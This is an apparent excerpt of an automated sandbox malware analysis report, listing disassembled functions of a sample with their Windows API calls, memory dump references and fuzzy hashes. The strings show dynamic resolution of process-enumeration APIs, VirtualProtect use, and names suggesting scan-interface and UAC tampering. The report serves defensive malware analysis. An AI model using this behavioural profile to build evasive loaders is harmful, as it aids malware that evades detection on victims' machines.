                                                                                                                                • Part of subcall function 028B7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                                • Part of subcall function 028B7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
                                                                                                                                • Part of subcall function 028B7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2543409266-0
                                                                                                                              • Opcode ID: 88b067c595a4354db16cb1b39245516ef827f4b92f25fe83a361ad9a481f4d16
                                                                                                                              • Instruction ID: 864a6534a940a92aa4ba88b41b807667d82caacf6bfb1b6804d56fc0d84f190c
                                                                                                                              • Opcode Fuzzy Hash: 88b067c595a4354db16cb1b39245516ef827f4b92f25fe83a361ad9a481f4d16
                                                                                                                              • Instruction Fuzzy Hash: 1501A97C644308EFFF04EB6CC8A1A5EB7A9FB44300F951464A519D3785EEB49D108F16
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AE320 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: 9f54c8d878c25271306874d3c20d6925d54335f178693ac7900d267c0a52f5fc
                                                                                                                              • Instruction ID: b18fa5324035706afbd9f9b10cb0522ca6529d700d01c24dde616f91f284a03d
                                                                                                                              • Opcode Fuzzy Hash: 9f54c8d878c25271306874d3c20d6925d54335f178693ac7900d267c0a52f5fc
                                                                                                                              • Instruction Fuzzy Hash: 80F0626C7045188AF7106B3CC8F4ABE2F9A6F45718B585C76A44ADB255CF34DC05CB63
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A4D14 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 028A4D1F
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 028A4D31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 986138563-0
                                                                                                                              • Opcode ID: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                                              • Instruction ID: 846e676072f85e273e455a7a61b33da49371b3329614ad6a78f973fe8e7ffdda
                                                                                                                              • Opcode Fuzzy Hash: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                                              • Instruction Fuzzy Hash: E7E0C2BC1012055EFF146F248C24B7B336AEFC1705F648498E808CA010DFB8D401AE34
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7098 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 028B7396
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID: H
                                                                                                                              • API String ID: 3341692771-2852464175
                                                                                                                              • Opcode ID: 33643c821eb60cb586e784e4e15847630022d01e1324a9c0c6bcbfa24246d2b4
                                                                                                                              • Instruction ID: 3a6e52e85f94505207e26ac1f22ce3db2198d5da2c84733841f922f5c2a42de0
                                                                                                                              • Opcode Fuzzy Hash: 33643c821eb60cb586e784e4e15847630022d01e1324a9c0c6bcbfa24246d2b4
                                                                                                                              • Instruction Fuzzy Hash: 8DB1CE79A016099FDB15CF98D880A9DFBF2FF8A314F248569E809EB360D730A845CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AE71C Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 028AE73D
                                                                                                                                • Part of subcall function 028AE320: VariantClear.OLEAUT32(?), ref: 028AE32F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCopy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 274517740-0
                                                                                                                              • Opcode ID: b4d96ddfa81c82539e76afcbb73c22e18ef14e38baffb247d1a75ad8c120113d
                                                                                                                              • Instruction ID: 5d3339735ba06d3c3b365f2e3b6347fbc9d4178f295fbe417a6f0c9ddc9de5a5
                                                                                                                              • Opcode Fuzzy Hash: b4d96ddfa81c82539e76afcbb73c22e18ef14e38baffb247d1a75ad8c120113d
                                                                                                                              • Instruction Fuzzy Hash: 0F11A52C7006148BFB20AF2DC8E496727EAEF85754B148C76E74ACB255DF31DC40CAA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AE3B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InitVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1927566239-0
                                                                                                                              • Opcode ID: f4fa5e3da0ea101fa5c67324ea6e9d35d04d1d2a53d5dde41142a6866a46feae
                                                                                                                              • Instruction ID: df28bccd37c73f4fe6b09d4c8bf4f55a3363d9a525e5b601d3533b2ca620ba9d
                                                                                                                              • Opcode Fuzzy Hash: f4fa5e3da0ea101fa5c67324ea6e9d35d04d1d2a53d5dde41142a6866a46feae
                                                                                                                              • Instruction Fuzzy Hash: D9314F7D905609AFFB10DE9CC8A4AAA77ECEB0C314F448971E909D7240DB74E950CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B6D28 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,028B6D75,?,?,?,00000000), ref: 028B6D55
                                                                                                                                • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeFromProgString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4225568880-0
                                                                                                                              • Opcode ID: 55add063de78fe80f7b827e4c2c165a9b0a79d393a45574588689cbb0c1766b7
                                                                                                                              • Instruction ID: cb6a1bf7120108f1b8aaff1eaf36710deb8d0188cd4782c5c69b739fe3b6225d
                                                                                                                              • Opcode Fuzzy Hash: 55add063de78fe80f7b827e4c2c165a9b0a79d393a45574588689cbb0c1766b7
                                                                                                                              • Instruction Fuzzy Hash: 3FE0653D6046147FFB01EA7ADC6199A7BEDDF49710BA10475A800D3700EDB57E008966
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A582C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028A584A
                                                                                                                                • Part of subcall function 028A5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028A0000,028CB790), ref: 028A5AAC
                                                                                                                                • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5ACA
                                                                                                                                • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5AE8
                                                                                                                                • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                                • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                                • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                                • Part of subcall function 028A5A90: RegCloseKey.ADVAPI32(?,028A5B9C,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2796650324-0
                                                                                                                              • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                              • Instruction ID: 84e06be41cad6753b4a1aa1c01a8b0a68c90affd47ab032339f2d90c630e8d87
                                                                                                                              • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                              • Instruction Fuzzy Hash: CBE06D79A002248BDB10DE5C88C0A5733D9AB08754F440961EC68CF246D774D9608BD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A7D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028A7DB0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3934441357-0
                                                                                                                              • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                              • Instruction ID: f7d5310df70e6d04538206600e2f8682be6393faffa0744a40718331ae0f24b8
                                                                                                                              • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                              • Instruction Fuzzy Hash: A7D05B7A3091107AE220955E5C44EBB5BDCCBC9771F14063DB668C3180DB608C018671
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B9E30 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
                                                                                                                              • Process32First.KERNEL32(?,00000128), ref: 028B9E41
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$FirstHandleModuleProcess32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2774106396-0
                                                                                                                              • Opcode ID: e8427c8ebf26f19d6f8087bdb455500fe9def051102d9fdf538cba401f269b3c
                                                                                                                              • Instruction ID: 74b39019fe5b97d257402501be6e29b3c4d40a8aefda071eaf03f6a991b6af30
                                                                                                                              • Opcode Fuzzy Hash: e8427c8ebf26f19d6f8087bdb455500fe9def051102d9fdf538cba401f269b3c
                                                                                                                              • Instruction Fuzzy Hash: DAC08CAA7122305B8F2166F92CC88D7578EDD8A0B730608A2F60DE3302D3658C109AA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B9E50 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
                                                                                                                              • Process32Next.KERNEL32(?,00000128), ref: 028B9E61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModuleNextProcess32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2237597116-0
                                                                                                                              • Opcode ID: 81ede38de897f283b9b4ecb9f718eda9502d0f26b4f24009673886857ba39f93
                                                                                                                              • Instruction ID: 6d1590662e59586ff7bad10d2243af77a6ce53d09d310f1ab2475cde444ae8b3
                                                                                                                              • Opcode Fuzzy Hash: 81ede38de897f283b9b4ecb9f718eda9502d0f26b4f24009673886857ba39f93
                                                                                                                              • Instruction Fuzzy Hash: C5C0805A711130578F1065F82CC44D7574DDD490B73054462F60DD3202D3654C105990
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A7E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                              • Instruction ID: 185a585f4fb335120d17b878280f492bd9e3525b69a323a135f1f7fe6d238989
                                                                                                                              • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                              • Instruction Fuzzy Hash: E7C08CAD202300067E5061FC0CE801E8388194413D32C0B39B02CD62E2EF2188323861
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A7E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,028C1133,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,ScanString), ref: 028A7E47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                              • Instruction ID: f7b36c44e7a80163fcdb1937a2ce4c3d9c8e59394d5316d8ab79b58fca39025d
                                                                                                                              • Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
                                                                                                                              • Instruction Fuzzy Hash: 81C08CEC6023040E7E5062FC1CE02AD828A194493A7282B21E02CE61D2EF1298323821
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A4C3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3341692771-0
                                                                                                                              • Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                                              • Instruction ID: 3b20eb4261908ec6d448a7ab464a4b8a9e752371e6a37718665d199ef57652e7
                                                                                                                              • Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                                              • Instruction Fuzzy Hash: 37C012AD64022047FF21965C9CD475562CCDB05395F1400A1D51CD7240EBB0D8008665
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A4C60 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              • SysReAllocStringLen.OLEAUT32(028C9E50,028BD42C,00000016), ref: 028A4C7A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: String$AllocFree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 344208780-0
                                                                                                                              • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                              • Instruction ID: c6e80fad9d70c178c914ef5c386e929d064fa0c02ab8b01c2641fbc5a6927c4b
                                                                                                                              • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                              • Instruction Fuzzy Hash: EFD0807C1001015EBF3CA519493493661AEDAD030FB6CDA5D980ECA140EFF5D401CA35
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

